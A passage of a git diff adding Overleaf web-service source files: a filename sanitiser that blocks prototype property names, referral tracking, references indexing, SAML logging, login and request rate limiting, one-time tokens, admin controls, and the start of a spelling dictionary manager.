['prototype'].concat(Object.getOwnPropertyNames(Object.prototype)) + // eslint-disable-next-line prefer-regex-literals + const BLOCKEDFILE_RX = new RegExp(`\ +^(\ +prototype\ +|constructor\ +|toString\ +|toLocaleString\ +|valueOf\ +|hasOwnProperty\ +|isPrototypeOf\ +|propertyIsEnumerable\ +|__defineGetter__\ +|__lookupGetter__\ +|__defineSetter__\ +|__lookupSetter__\ +|__proto__\ +)$\ +`) + + const MAX_PATH = 1024 // Maximum path length, in characters. This is fairly arbitrary. + + return (SafePath = { + // convert any invalid characters to underscores in the given filename + clean(filename) { + filename = filename.replace(BADCHAR_RX, '_') + // for BADFILE_RX replace any matches with an equal number of underscores + filename = filename.replace(BADFILE_RX, match => + new Array(match.length + 1).join('_') + ) + // replace blocked filenames 'prototype' with '@prototype' + filename = filename.replace(BLOCKEDFILE_RX, '@$1') + return filename + }, + + // returns whether the filename is 'clean' (does not contain any invalid + // characters or reserved words) + isCleanFilename(filename) { + return ( + SafePath.isAllowedLength(filename) && + !filename.match(BADCHAR_RX) && + !filename.match(BADFILE_RX) + ) + }, + + isBlockedFilename(filename) { + return BLOCKEDFILE_RX.test(filename) + }, + + // returns whether a full path is 'clean' - e.g. 
is a full or relative path + // that points to a file, and each element passes the rules in 'isCleanFilename' + isCleanPath(path) { + const elements = path.split('/') + + const lastElementIsEmpty = elements[elements.length - 1].length === 0 + if (lastElementIsEmpty) { + return false + } + + for (const element of Array.from(elements)) { + if (element.length > 0 && !SafePath.isCleanFilename(element)) { + return false + } + } + + // check for a top-level reserved name + if (BLOCKEDFILE_RX.test(path.replace(/^\/?/, ''))) { + return false + } // remove leading slash if present + + return true + }, + + isAllowedLength(pathname) { + return pathname.length > 0 && pathname.length <= MAX_PATH + }, + }) +} + +module.exports = load() diff --git a/services/web/app/src/Features/Project/types.d.ts b/services/web/app/src/Features/Project/types.d.ts new file mode 100644 index 0000000..c59f551 --- /dev/null +++ b/services/web/app/src/Features/Project/types.d.ts @@ -0,0 +1,38 @@ +import express from 'express' +import { + GetProjectsRequestBody, + GetProjectsResponseBody, +} from '../../../../types/project/dashboard/api' + +export type GetProjectsRequest = express.Request< + unknown, + unknown, + GetProjectsRequestBody, + unknown +> + +export type GetProjectsResponse = express.Response<GetProjectsResponseBody> + +export type MongoProject = { + _id: string + name: string + lastUpdated: Date + lastUpdatedBy: string + publicAccesLevel: string + archived: string[] + trashed: boolean + owner_ref: string + tokens: { + readOnly: string[] + readAndWrite: string[] + readAndWritePrefix: string[] + }[] +} + +export type AllUsersProjects = { + owned: MongoProject[] + readAndWrite: MongoProject[] + readOnly: MongoProject[] + tokenReadAndWrite: MongoProject[] + tokenReadOnly: MongoProject[] +} diff --git a/services/web/app/src/Features/Publishers/PublishersGetter.js b/services/web/app/src/Features/Publishers/PublishersGetter.js new file mode 100644 index 0000000..9167a70 --- /dev/null +++ b/services/web/app/src/Features/Publishers/PublishersGetter.js @@ -0,0 +1,42 @@ +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const { fetchJson } = require('@overleaf/fetch-utils') +const { callbackify } = require('@overleaf/promise-utils') +const UserMembershipsHandler = require('../UserMembership/UserMembershipsHandler') +const UserMembershipEntityConfigs = require('../UserMembership/UserMembershipEntityConfigs') + +async function getManagedPublishers(userId) { + return await UserMembershipsHandler.promises.getEntitiesByUser( + UserMembershipEntityConfigs.publisher, + userId + ) +} + +async function fetchV1Data(publisher) { + const url = `${Settings.apis.v1.url}/api/v2/brands/${publisher.slug}` + try { + const data = await fetchJson(url, { + basicAuth: { + user: Settings.apis.v1.user, + password: Settings.apis.v1.pass, + }, + signal: AbortSignal.timeout(Settings.apis.v1.timeout), + }) + + publisher.name = data?.name + publisher.partner = data?.partner + } catch (error) { + logger.err( + { model: 'Publisher', slug: publisher.slug, error }, + '[fetchV1DataError]' + ) + } +} + +module.exports = { + getManagedPublishers: callbackify(getManagedPublishers), + promises: { + getManagedPublishers, + fetchV1Data, + }, +} diff --git a/services/web/app/src/Features/Referal/ReferalAllocator.js b/services/web/app/src/Features/Referal/ReferalAllocator.js new file mode 100644 index 0000000..bf42fb8 --- /dev/null +++ b/services/web/app/src/Features/Referal/ReferalAllocator.js @@ -0,0 +1,48 @@ +const OError 
= require('@overleaf/o-error') +const { User } = require('../../models/User') +const FeaturesUpdater = require('../Subscription/FeaturesUpdater') +const { callbackify } = require('@overleaf/promise-utils') + +async function allocate(referalId, newUserId, referalSource, referalMedium) { + if (referalId == null) { + return null + } + + const query = { referal_id: referalId } + const user = await User.findOne(query, { _id: 1 }).exec() + if (user == null || user._id == null) { + return null + } + + if (referalSource === 'bonus') { + try { + await User.updateOne( + query, + { + $push: { + refered_users: newUserId, + }, + $inc: { + refered_user_count: 1, + }, + }, + {} + ).exec() + } catch (err) { + OError.tag(err, 'something went wrong allocating referal', { + referalId, + newUserId, + }) + throw err + } + + return await FeaturesUpdater.promises.refreshFeatures(user._id, 'referral') + } +} + +module.exports = { + allocate: callbackify(allocate), + promises: { + allocate, + }, +} diff --git a/services/web/app/src/Features/Referal/ReferalConnect.mjs b/services/web/app/src/Features/Referal/ReferalConnect.mjs new file mode 100644 index 0000000..7b65151 --- /dev/null +++ b/services/web/app/src/Features/Referal/ReferalConnect.mjs @@ -0,0 +1,52 @@ +export default { + use(req, res, next) { + if (req.query != null) { + if (req.query.referal != null) { + req.session.referal_id = req.query.referal + } else if (req.query.r != null) { + // Short hand for referal + req.session.referal_id = req.query.r + } else if (req.query.fb_ref != null) { + req.session.referal_id = req.query.fb_ref + } + + if (req.query.rm != null) { + // referal medium e.g. twitter, facebook, email + switch (req.query.rm) { + case 'fb': + req.session.referal_medium = 'facebook' + break + case 't': + req.session.referal_medium = 'twitter' + break + case 'gp': + req.session.referal_medium = 'google_plus' + break + case 'e': + req.session.referal_medium = 'email' + break + case 'd': + req.session.referal_medium = 'direct' + break + } + } + + if (req.query.rs != null) { + // referal source e.g. 
project share, bonus + switch (req.query.rs) { + case 'b': + req.session.referal_source = 'bonus' + break + case 'ps': + req.session.referal_source = 'public_share' + break + case 'ci': + req.session.referal_source = 'collaborator_invite' + break + } + } + } + + next() + }, +} diff --git a/services/web/app/src/Features/Referal/ReferalController.mjs b/services/web/app/src/Features/Referal/ReferalController.mjs new file mode 100644 index 0000000..8315ac7 --- /dev/null +++ b/services/web/app/src/Features/Referal/ReferalController.mjs @@ -0,0 +1,17 @@ +import ReferalHandler from './ReferalHandler.mjs' +import SessionManager from '../Authentication/SessionManager.js' + +export default { + bonus(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + ReferalHandler.getReferedUsers(userId, (err, { referedUserCount }) => { + if (err) { + next(err) + } else { + res.render('referal/bonus', { + refered_user_count: referedUserCount, + }) + } + }) + }, +} diff --git a/services/web/app/src/Features/Referal/ReferalFeatures.js b/services/web/app/src/Features/Referal/ReferalFeatures.js new file mode 100644 index 0000000..7f3e732 --- /dev/null +++ b/services/web/app/src/Features/Referal/ReferalFeatures.js @@ -0,0 +1,48 @@ +const _ = require('lodash') +const { callbackify } = require('util') +const { User } = require('../../models/User') +const Settings = require('@overleaf/settings') + +const ReferalFeatures = { + async getBonusFeatures(userId) { + const query = { _id: userId } + const user = await User.findOne(query, { refered_user_count: 1 }).exec() + + if (user == null) { + throw new Error(`user not found ${userId} for assignBonus`) + } + + if (user.refered_user_count != null && user.refered_user_count > 0) { + const newFeatures = ReferalFeatures._calculateFeatures(user) + return newFeatures + } + + return {} + }, + + _calculateFeatures(user) { + const bonusLevel = ReferalFeatures._getBonusLevel(user) + return ( + (Settings.bonus_features != null + ? 
Settings.bonus_features[`${bonusLevel}`] + : undefined) || {} + ) + }, + + _getBonusLevel(user) { + let highestBonusLevel = 0 + _.forEach(_.keys(Settings.bonus_features), function (level) { + const levelIsLessThanUser = level <= user.refered_user_count + const levelIsMoreThanCurrentHighest = level >= highestBonusLevel + if (levelIsLessThanUser && levelIsMoreThanCurrentHighest) { + return (highestBonusLevel = level) + } + }) + return highestBonusLevel + }, +} + +module.exports = { + getBonusFeatures: callbackify(ReferalFeatures.getBonusFeatures), + promises: ReferalFeatures, +} diff --git a/services/web/app/src/Features/Referal/ReferalHandler.mjs b/services/web/app/src/Features/Referal/ReferalHandler.mjs new file mode 100644 index 0000000..1d389bb --- /dev/null +++ b/services/web/app/src/Features/Referal/ReferalHandler.mjs @@ -0,0 +1,17 @@ +import { callbackify } from '@overleaf/promise-utils' +import { User } from '../../models/User.js' + +async function getReferedUsers(userId) { + const projection = { refered_users: 1, refered_user_count: 1 } + const user = await User.findById(userId, projection).exec() + const referedUsers = user.refered_users || [] + const referedUserCount = user.refered_user_count || referedUsers.length + return { referedUsers, referedUserCount } +} + +export default { + getReferedUsers: callbackify(getReferedUsers), + promises: { + getReferedUsers, + }, +} diff --git a/services/web/app/src/Features/References/ReferencesController.mjs b/services/web/app/src/Features/References/ReferencesController.mjs new file mode 100644 index 0000000..378f096 --- /dev/null +++ b/services/web/app/src/Features/References/ReferencesController.mjs @@ -0,0 +1,53 @@ +/* eslint-disable + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import ReferencesHandler from './ReferencesHandler.mjs' +import EditorRealTimeController from '../Editor/EditorRealTimeController.js' +import { OError } from '../Errors/Errors.js' + +let ReferencesController + +export default ReferencesController = { + indexAll(req, res, next) { + const projectId = req.params.Project_id + const { shouldBroadcast } = req.body + return ReferencesHandler.indexAll(projectId, function (error, data) { + if (error) { + OError.tag(error, 'failed to index references', { projectId }) + return next(error) + } + return ReferencesController._handleIndexResponse( + req, + res, + projectId, + shouldBroadcast, + true, + data + ) + }) + }, + + _handleIndexResponse(req, res, projectId, shouldBroadcast, isAllDocs, data) { + if (data == null || data.keys == null) { + return res.json({ projectId, keys: [] }) + } + if (shouldBroadcast) { + EditorRealTimeController.emitToRoom( + projectId, + 'references:keys:updated', + data.keys, + isAllDocs + ) + } + return res.json(data) + }, +} diff --git a/services/web/app/src/Features/References/ReferencesHandler.mjs b/services/web/app/src/Features/References/ReferencesHandler.mjs new file mode 100644 index 0000000..9ff61f2 --- /dev/null +++ b/services/web/app/src/Features/References/ReferencesHandler.mjs @@ -0,0 +1,221 @@ +/* eslint-disable + n/handle-callback-err, + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. 
+// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS103: Rewrite code to no longer use __guard__ + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import OError from '@overleaf/o-error' +import logger from '@overleaf/logger' +import request from 'request' +import settings from '@overleaf/settings' +import Features from '../../infrastructure/Features.js' +import ProjectGetter from '../Project/ProjectGetter.js' +import UserGetter from '../User/UserGetter.js' +import DocumentUpdaterHandler from '../DocumentUpdater/DocumentUpdaterHandler.js' +import _ from 'lodash' +import Async from 'async' +import Errors from '../Errors/Errors.js' +import { promisify } from '@overleaf/promise-utils' +import HistoryURLHelper from '../History/HistoryURLHelper.js' + +let ReferencesHandler + +if (!Features.hasFeature('references')) { + logger.debug('references search not enabled') +} + +export default ReferencesHandler = { + _buildDocUrl(projectId, docId) { + return { + url: `${settings.apis.docstore.url}/project/${projectId}/doc/${docId}/raw`, + } + }, + + _findBibFileRefs(project) { + const fileRefs = [] + function _process(folder) { + _.forEach(folder.fileRefs || [], function (file) { + if ( + __guard__(file != null ? file.name : undefined, x1 => + x1.match(/^.*\.bib$/) + ) + ) { + return fileRefs.push(file) + } + }) + return _.forEach(folder.folders || [], folder => _process(folder)) + } + _.forEach(project.rootFolder || [], rootFolder => _process(rootFolder)) + return fileRefs + }, + + _findBibDocIds(project) { + const ids = [] + function _process(folder) { + _.forEach(folder.docs || [], function (doc) { + if ( + __guard__(doc != null ? doc.name : undefined, x1 => + x1.match(/^.*\.bib$/) + ) + ) { + return ids.push(doc._id) + } + }) + return _.forEach(folder.folders || [], folder => _process(folder)) + } + _.forEach(project.rootFolder || [], rootFolder => _process(rootFolder)) + return ids + }, + + _isFullIndex(project, callback) { + if (callback == null) { + callback = function () {} + } + return UserGetter.getUser( + project.owner_ref, + { features: true }, + function (err, owner) { + if (err != null) { + return callback(err) + } + const features = owner != null ? owner.features : undefined + return callback( + null, + (features != null ? features.references : undefined) === true || + (features != null ? 
features.referencesSearch : undefined) === true + ) + } + ) + }, + + indexAll(projectId, callback) { + if (callback == null) { + callback = function () {} + } + return ProjectGetter.getProject( + projectId, + { rootFolder: true, owner_ref: 1, 'overleaf.history.id': 1 }, + function (err, project) { + if (err) { + OError.tag(err, 'error finding project', { + projectId, + }) + return callback(err) + } + if (!project) { + return callback( + new Errors.NotFoundError(`project does not exist: ${projectId}`) + ) + } + logger.debug({ projectId }, 'indexing all bib files in project') + const docIds = ReferencesHandler._findBibDocIds(project) + const fileRefs = ReferencesHandler._findBibFileRefs(project) + return ReferencesHandler._doIndexOperation( + projectId, + project, + docIds, + fileRefs, + callback + ) + } + ) + }, + + _doIndexOperation(projectId, project, docIds, fileRefs, callback) { + if (!Features.hasFeature('references')) { + return callback() + } + const historyId = project?.overleaf?.history?.id + if (!historyId) { + return callback( + new OError('project does not have a history id', { projectId }) + ) + } + return ReferencesHandler._isFullIndex(project, function (err, isFullIndex) { + if (err) { + OError.tag(err, 'error checking whether to do full index', { + projectId, + }) + return callback(err) + } + logger.debug( + { projectId, docIds }, + 'flushing docs to mongo before calling references service' + ) + return Async.series( + docIds.map( + docId => cb => + DocumentUpdaterHandler.flushDocToMongo(projectId, docId, cb) + ), + function (err) { + // continue + if (err) { + OError.tag(err, 'error flushing docs to mongo', { + projectId, + docIds, + }) + return callback(err) + } + const bibDocUrls = docIds.map(docId => + ReferencesHandler._buildDocUrl(projectId, docId) + ) + const bibFileUrls = fileRefs.map(fileRef => + HistoryURLHelper.projectHistoryURLWithFilestoreFallback( + settings, + projectId, + historyId, + fileRef, + 'bibFileUrls' + ) + ) + const sourceURLs = bibDocUrls.concat(bibFileUrls) + return request.post( + { + url: `${settings.apis.references.url}/project/${projectId}/index`, + json: { + docUrls: sourceURLs.map(item => item.fallbackURL || item.url), + sourceURLs, + fullIndex: isFullIndex, + }, + }, + function (err, res, data) { + if (err) { + OError.tag(err, 'error communicating with references api', { + projectId, + }) + return callback(err) + } + if (res.statusCode >= 200 && res.statusCode < 300) { + logger.debug({ projectId }, 'got keys from references api') + return callback(null, data) + } else { + err = new Error( + `references api responded with non-success code: ${res.statusCode}` + ) + return callback(err) + } + } + ) + } + ) + }) + }, +} + +ReferencesHandler.promises = { + indexAll: promisify(ReferencesHandler.indexAll), +} + +function __guard__(value, transform) { + return typeof value !== 'undefined' && value !== null + ? 
transform(value) + : undefined +} diff --git a/services/web/app/src/Features/SamlLog/SamlLogHandler.js b/services/web/app/src/Features/SamlLog/SamlLogHandler.js new file mode 100644 index 0000000..e8ddd68 --- /dev/null +++ b/services/web/app/src/Features/SamlLog/SamlLogHandler.js @@ -0,0 +1,85 @@ +const { SamlLog } = require('../../models/SamlLog') +const SessionManager = require('../Authentication/SessionManager') +const logger = require('@overleaf/logger') +const { err: errSerializer } = require('@overleaf/logger/serializers') +const { callbackify } = require('util') +const Settings = require('@overleaf/settings') + +const ALLOWED_PATHS = Settings.saml?.logAllowList || ['/saml/'] + +async function log(req, data, samlAssertion) { + let providerId, sessionId + + data = data || {} + + try { + const { path, query } = req + if (!ALLOWED_PATHS.some(allowedPath => path.startsWith(allowedPath))) { + return + } + + const { saml } = req.session + const userId = SessionManager.getLoggedInUserId(req.session) + + providerId = (req.session.saml?.universityId || '').toString() + sessionId = (req.sessionID || '').toString().substr(0, 8) + + const samlLog = new SamlLog() + samlLog.providerId = providerId + samlLog.sessionId = sessionId + samlLog.path = path + samlLog.userId = userId + data.query = query + data.samlSession = saml + + if (data.error instanceof Error) { + const errSerialized = errSerializer(data.error) + if (data.error.tryAgain) { + errSerialized.tryAgain = data.error.tryAgain + } + req.logger.addFields({ providerId, sessionId, userId }) + data.error = errSerialized + } + + if (samlAssertion) { + const samlAssertionForLog = { + assertionXml: samlAssertion.getAssertionXml(), + responseXml: samlAssertion.getSamlResponseXml(), + assertionJsonExtended: req.user_info, + } + samlLog.samlAssertion = JSON.stringify(samlAssertionForLog) + } + + if (data.error) { + data.body = {} + if (req.body.email) { + data.body.email = req.body.email + } + if (req.body.SAMLResponse) { + data.body.SAMLResponse = req.body.SAMLResponse + } + } + + try { + samlLog.jsonData = JSON.stringify(data) + } catch (err) { + // log but continue on data errors + logger.error( + { err, sessionId, providerId }, + 'SamlLog JSON.stringify Error' + ) + } + await samlLog.save() + } catch (err) { + logger.error({ err, sessionId, providerId }, 'SamlLog Error') + } +} + +const SamlLogHandler = { + log: callbackify(log), + promises: { + log, + }, +} + +module.exports = SamlLogHandler diff --git a/services/web/app/src/Features/Security/LoginRateLimiter.js b/services/web/app/src/Features/Security/LoginRateLimiter.js new file mode 100644 index 0000000..58a351d --- /dev/null +++ b/services/web/app/src/Features/Security/LoginRateLimiter.js @@ -0,0 +1,45 @@ +const { RateLimiter } = require('../../infrastructure/RateLimiter') +const { promisifyAll } = require('@overleaf/promise-utils') +const Settings = require('@overleaf/settings') + +const rateLimiterLoginEmail = new RateLimiter( + 'login', + Settings.rateLimit?.login?.email || { + points: 10, + duration: 120, + } +) + +function processLoginRequest(email, callback) { + rateLimiterLoginEmail + .consume(email.trim().toLowerCase(), 1, { method: 'email' }) + .then(() => { + callback(null, true) + }) + .catch(err => { + if (err instanceof Error) { + callback(err) + } else { + callback(null, false) + } + }) +} + +function recordSuccessfulLogin(email, callback) { + rateLimiterLoginEmail + .delete(email) + .then(() => { + callback() + }) + .catch(err => { + callback(err) + }) +} + +const 
LoginRateLimiter = {
+  processLoginRequest,
+  recordSuccessfulLogin,
+}
+LoginRateLimiter.promises = promisifyAll(LoginRateLimiter)
+
+module.exports = LoginRateLimiter
diff --git a/services/web/app/src/Features/Security/OneTimeTokenHandler.js b/services/web/app/src/Features/Security/OneTimeTokenHandler.js
new file mode 100644
index 0000000..ef49c68
--- /dev/null
+++ b/services/web/app/src/Features/Security/OneTimeTokenHandler.js
@@ -0,0 +1,137 @@
+const crypto = require('crypto')
+const { db } = require('../../infrastructure/mongodb')
+const Errors = require('../Errors/Errors')
+const { promisifyAll } = require('@overleaf/promise-utils')
+const { callbackify } = require('util')
+
+const ONE_HOUR_IN_S = 60 * 60
+
+async function peekValueFromToken(use, token) {
+  const tokenDoc = await db.tokens.findOneAndUpdate(
+    {
+      use,
+      token,
+      expiresAt: { $gt: new Date() },
+      usedAt: { $exists: false },
+      peekCount: { $not: { $gte: OneTimeTokenHandler.MAX_PEEKS } },
+    },
+    {
+      $inc: { peekCount: 1 },
+    },
+    {
+      returnDocument: 'after',
+    }
+  )
+  if (!tokenDoc) {
+    throw new Errors.NotFoundError('no token found')
+  }
+  // The reported number of remaining peeks will be at most OneTimeTokenHandler.MAX_PEEKS - 1,
+  // since findOneAndUpdate above returns the updated doc, with peekCount already incremented
+  const remainingPeeks = OneTimeTokenHandler.MAX_PEEKS - tokenDoc.peekCount
+
+  return { data: tokenDoc.data, remainingPeeks }
+}
+
+const OneTimeTokenHandler = {
+  MAX_PEEKS: 4,
+
+  getNewToken(use, data, options, callback) {
+    // options is optional
+    if (!options) {
+      options = {}
+    }
+    if (typeof options === 'function') {
+      callback = options
+      options = {}
+    }
+    const expiresIn = options.expiresIn || ONE_HOUR_IN_S
+    const createdAt = new Date()
+    const expiresAt = new Date(createdAt.getTime() + expiresIn * 1000)
+    const token = crypto.randomBytes(32).toString('hex')
+    db.tokens.insertOne(
+      {
+        use,
+        token,
+        data,
+        createdAt,
+        expiresAt,
+      },
+      function (error) {
+        if (error) {
+          return callback(error)
+        }
+        callback(null, token)
+      }
+    )
+  },
+
+  getValueFromTokenAndExpire(use, token, callback) {
+    const now = new Date()
+    db.tokens.findOneAndUpdate(
+      {
+        use,
+        token,
+        expiresAt: { $gt: now },
+        usedAt: { $exists: false },
+        peekCount: { $not: { $gte: OneTimeTokenHandler.MAX_PEEKS } },
+      },
+      {
+        $set: {
+          usedAt: now,
+        },
+      },
+      function (error, token) {
+        if (error) {
+          return callback(error)
+        }
+        if (!token) {
+          return callback(new Errors.NotFoundError('no token found'))
+        }
+        callback(null, token.data)
+      }
+    )
+  },
+
+  peekValueFromToken: callbackify(peekValueFromToken),
+
+  expireToken(use, token, callback) {
+    const now = new Date()
+    db.tokens.updateOne(
+      {
+        use,
+        token,
+      },
+      {
+        $set: {
+          usedAt: now,
+        },
+      },
+      error => {
+        callback(error)
+      }
+    )
+  },
+
+  expireAllTokensForUser(userId, use, callback) {
+    const now = new Date()
+    db.tokens.updateMany(
+      {
+        use,
+        'data.user_id': userId.toString(),
+        usedAt: { $exists: false },
+      },
+      {
+        $set: {
+          usedAt: now,
+        },
+      },
+      error => {
+        callback(error)
+      }
+    )
+  },
+}
+
+OneTimeTokenHandler.promises = promisifyAll(OneTimeTokenHandler)
+
+module.exports = OneTimeTokenHandler
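+
+// Usage sketch (illustrative only; 'password-reset' is a hypothetical token
+// namespace, and expiresIn is in seconds):
+//
+//   OneTimeTokenHandler.getNewToken(
+//     'password-reset',
+//     { user_id: userId.toString() },
+//     { expiresIn: 2 * ONE_HOUR_IN_S },
+//     (err, token) => {
+//       // hand the token to the user, e.g. in an email link
+//     }
+//   )
+//
+//   // Each successful peek increments peekCount; once MAX_PEEKS is reached
+//   // the token no longer resolves and a NotFoundError is thrown.
+//   const { data, remainingPeeks } =
+//     await OneTimeTokenHandler.promises.peekValueFromToken('password-reset', token)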
diff --git a/services/web/app/src/Features/Security/RateLimiterMiddleware.js b/services/web/app/src/Features/Security/RateLimiterMiddleware.js
new file mode 100644
index 0000000..571eb8a
--- /dev/null
+++ b/services/web/app/src/Features/Security/RateLimiterMiddleware.js
@@ -0,0 +1,91 @@
+const logger = require('@overleaf/logger')
+const SessionManager = require('../Authentication/SessionManager')
+const LoginRateLimiter = require('./LoginRateLimiter')
+const settings = require('@overleaf/settings')
+
+/**
+ * Return a rate limiting middleware
+ *
+ * Pass an array of opts.params to segment this based on parameters in the
+ * request URL, e.g.:
+ *
+ * app.get('/project/:project_id', RateLimiterMiddleware.rateLimit(
+ *   rateLimiter, { params: ['project_id'] }
+ * ))
+ *
+ * will rate limit each project_id separately.
+ *
+ * Unique clients are identified by user_id if logged in, and IP address if not.
+ * The method label is used to identify this in our metrics.
+ */
+function rateLimit(rateLimiter, opts = {}) {
+  const getUserId =
+    opts.getUserId || (req => SessionManager.getLoggedInUserId(req.session))
+  return function (req, res, next) {
+    const clientId = opts.ipOnly ? req.ip : getUserId(req) || req.ip
+    const method = clientId === req.ip ? 'ip' : 'userId'
+
+    if (
+      settings.smokeTest &&
+      settings.smokeTest.userId &&
+      settings.smokeTest.userId.toString() === clientId.toString()
+    ) {
+      // ignore smoke test user
+      return next()
+    }
+
+    let key = clientId
+    if (!opts.ipOnly) {
+      const params = (opts.params || []).map(p => req.params[p])
+      params.push(clientId)
+      key = params.join(':')
+    }
+
+    rateLimiter
+      .consume(key, 1, { method })
+      .then(() => next())
+      .catch(err => {
+        if (err instanceof Error) {
+          next(err)
+        } else {
+          res.status(429) // Too many requests
+          res.write('Rate limit reached, please try again later')
+          res.end()
+        }
+      })
+  }
+}
+
+function loginRateLimitEmail(emailField = 'email') {
+  return function (req, res, next) {
+    const email = req.body[emailField]
+    if (!email) {
+      return next()
+    }
+    LoginRateLimiter.processLoginRequest(email, (err, isAllowed) => {
+      if (err) {
+        return next(err)
+      }
+      if (isAllowed) {
+        next()
+      } else {
+        logger.warn({ email }, 'rate limit exceeded')
+        res.status(429) // Too many requests
+        res.json({
+          message: {
+            type: 'error',
+            text: req.i18n.translate('to_many_login_requests_2_mins'),
+            key: 'to-many-login-requests-2-mins',
+          },
+        })
+      }
+    })
+  }
+}
+
+const RateLimiterMiddleware = {
+  rateLimit,
+  loginRateLimitEmail,
+}
+
+module.exports = RateLimiterMiddleware
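+
+// Usage sketch (illustrative; the 'open-project' limiter, its limits and the
+// ProjectController handler are made-up names):
+//
+//   const { RateLimiter } = require('../../infrastructure/RateLimiter')
+//   const openProjectLimiter = new RateLimiter('open-project', {
+//     points: 15,
+//     duration: 60,
+//   })
+//   app.get(
+//     '/project/:project_id',
+//     RateLimiterMiddleware.rateLimit(openProjectLimiter, {
+//       params: ['project_id'],
+//     }),
+//     ProjectController.loadEditor
+//   )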
diff --git a/services/web/app/src/Features/ServerAdmin/AdminController.js b/services/web/app/src/Features/ServerAdmin/AdminController.js
new file mode 100644
index 0000000..261a5c2
--- /dev/null
+++ b/services/web/app/src/Features/ServerAdmin/AdminController.js
@@ -0,0 +1,97 @@
+const logger = require('@overleaf/logger')
+const http = require('http')
+const https = require('https')
+const Settings = require('@overleaf/settings')
+const TpdsUpdateSender = require('../ThirdPartyDataStore/TpdsUpdateSender')
+const TpdsProjectFlusher = require('../ThirdPartyDataStore/TpdsProjectFlusher')
+const EditorRealTimeController = require('../Editor/EditorRealTimeController')
+const SystemMessageManager = require('../SystemMessages/SystemMessageManager')
+
+const AdminController = {
+  _sendDisconnectAllUsersMessage: delay => {
+    return EditorRealTimeController.emitToAll(
+      'forceDisconnect',
+      'Sorry, we are performing a quick update to the editor and need to close it down. Please refresh the page to continue.',
+      delay
+    )
+  },
+  index: (req, res, next) => {
+    let url
+    const openSockets = {}
+    for (url in http.globalAgent.sockets) {
+      openSockets[`http://${url}`] = http.globalAgent.sockets[url].map(
+        socket => socket._httpMessage.path
+      )
+    }
+
+    for (url in https.globalAgent.sockets) {
+      openSockets[`https://${url}`] = https.globalAgent.sockets[url].map(
+        socket => socket._httpMessage.path
+      )
+    }
+
+    SystemMessageManager.getMessagesFromDB(function (error, systemMessages) {
+      if (error) {
+        return next(error)
+      }
+      res.render('admin/index', {
+        title: 'System Admin',
+        openSockets,
+        systemMessages,
+      })
+    })
+  },
+
+  disconnectAllUsers: (req, res) => {
+    logger.warn('disconnecting everyone')
+    const delay = (req.query && req.query.delay) > 0 ? req.query.delay : 10
+    AdminController._sendDisconnectAllUsersMessage(delay)
+    res.redirect('/admin#open-close-editor')
+  },
+
+  openEditor(req, res) {
+    logger.warn('opening editor')
+    Settings.editorIsOpen = true
+    res.redirect('/admin#open-close-editor')
+  },
+
+  closeEditor(req, res) {
+    logger.warn('closing editor')
+    Settings.editorIsOpen = req.body.isOpen
+    res.redirect('/admin#open-close-editor')
+  },
+
+  flushProjectToTpds(req, res, next) {
+    TpdsProjectFlusher.flushProjectToTpds(req.body.project_id, error => {
+      if (error) {
+        return next(error)
+      }
+      res.sendStatus(200)
+    })
+  },
+
+  pollDropboxForUser(req, res) {
+    const { user_id: userId } = req.body
+    TpdsUpdateSender.pollDropboxForUser(userId, () => res.sendStatus(200))
+  },
+
+  createMessage(req, res, next) {
+    SystemMessageManager.createMessage(req.body.content, function (error) {
+      if (error) {
+        return next(error)
+      }
+      res.redirect('/admin#system-messages')
+    })
+  },
+
+  clearMessages(req, res, next) {
+    SystemMessageManager.clearMessages(function (error) {
+      if (error) {
+        return next(error)
+      }
+      res.redirect('/admin#system-messages')
+    })
+  },
+}
+
+module.exports = AdminController
diff --git a/services/web/app/src/Features/SocketDiagnostics/SocketDiagnostics.mjs b/services/web/app/src/Features/SocketDiagnostics/SocketDiagnostics.mjs
new file mode 100644
index 0000000..74672bd
--- /dev/null
+++ b/services/web/app/src/Features/SocketDiagnostics/SocketDiagnostics.mjs
@@ -0,0 +1,11 @@
+import { expressify } from '@overleaf/promise-utils'
+
+const index = async (req, res) => {
+  res.render('project/editor/socket_diagnostics')
+}
+
+const SocketDiagnostics = {
+  index: expressify(index),
+}
+
+export default SocketDiagnostics
diff --git a/services/web/app/src/Features/Spelling/LearnedWordsManager.js b/services/web/app/src/Features/Spelling/LearnedWordsManager.js
new file mode 100644
index 0000000..66d80fc
--- /dev/null
+++ b/services/web/app/src/Features/Spelling/LearnedWordsManager.js
@@ -0,0 +1,94 @@
+const { db } = require('../../infrastructure/mongodb')
+const { promisify } = require('util')
+const OError = require('@overleaf/o-error')
+const Settings = require('@overleaf/settings')
+const { InvalidError } = require('../Errors/Errors')
+
+const LearnedWordsManager = {
+  learnWord(userToken, word, callback) {
+    LearnedWordsManager.getLearnedWordsSize(userToken, (error, wordsSize) => {
+      if (error != null) {
+        return callback(OError.tag(error))
+      }
+      const wordSize = Buffer.from(word).length
+      if (wordsSize + wordSize > Settings.maxDictionarySize) {
+        return callback(new InvalidError('Max dictionary size reached'))
+      }
+      db.spellingPreferences.updateOne(
+        {
+          token: userToken,
+        },
+        {
+          $addToSet: { learnedWords: word },
+        },
+        {
+          upsert:
